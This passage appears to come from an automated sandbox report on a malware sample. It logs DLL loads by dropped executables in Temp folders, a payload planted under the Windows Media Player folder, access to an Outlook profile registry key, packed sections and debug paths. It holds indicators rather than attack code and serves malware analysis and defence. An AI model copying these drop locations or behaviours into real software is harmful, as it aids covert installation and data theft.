                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: napinsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: pnrpnsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: wshbth.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: nlaapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: winrnr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: samlib.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: netapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: samcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: taskschd.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: napinsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: pnrpnsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: wshbth.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: nlaapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: winrnr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: samlib.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: amsi.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: userenv.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: napinsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: pnrpnsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: wshbth.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: nlaapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: winrnr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: windowscodecs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: napinsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: pnrpnsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: wshbth.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: nlaapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: winrnr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: rstrtmgr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: dlnashext.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: wpdshext.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: amsi.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: userenv.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: amsi.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: userenv.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: amsi.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: userenv.dll
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Windows\System32\mode.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\mode.comSection loaded: ureg.dll
                              Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: msimg32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: msvcr100.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: linkinfo.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: ntshrui.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSection loaded: cscapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: webio.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Google\Chrome\Extensions
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Windows Media Player\graph
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Windows Media Player\graph\graph.exe
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                              Source: file.exeStatic file information: File size 3263488 > 1048576
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                              Source: file.exeStatic PE information: Raw size of dblbhqnk is bigger than: 0x100000 < 0x2b0e00
                              Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: cc6f25572f.exe, 00000010.00000003.2843921886.000002B0C3894000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000012.00000000.2844105614.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000014.00000000.2876091171.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000015.00000000.2968882677.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000017.00000000.3051120519.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp
                              Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp
                              Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp
                              Source: Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: af155ed129.exe, 00000006.00000000.2441026103.000000000032C000.00000002.00000001.01000000.00000009.sdmp
                              Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: cc6f25572f.exe, 00000010.00000003.2843921886.000002B0C3894000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000012.00000000.2844105614.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000014.00000000.2876091171.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000015.00000000.2968882677.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000017.00000000.3051120519.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp

                              Data Obfuscation

                              barindex
                              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.850000.0.unpack :EW;.rsrc:W;.idata :W;dblbhqnk:EW;rrjzixml:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dblbhqnk:EW;rrjzixml:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.9a0000.0.unpack :EW;.rsrc:W;.idata :W;dblbhqnk:EW;rrjzixml:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dblbhqnk:EW;rrjzixml:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeUnpacked PE file: 12.2.5cda6c90d7.exe.f70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeUnpacked PE file: 22.2.b05c9e01f3.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wasfhoet:EW;ygjteyur:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wasfhoet:EW;ygjteyur:EW;.taggant:EW;
                              Source: Y-Cleaner.exe.31.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
                              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                              Source: random[1].exe1.5.drStatic PE information: real checksum: 0x1d4149 should be: 0x1d15dc
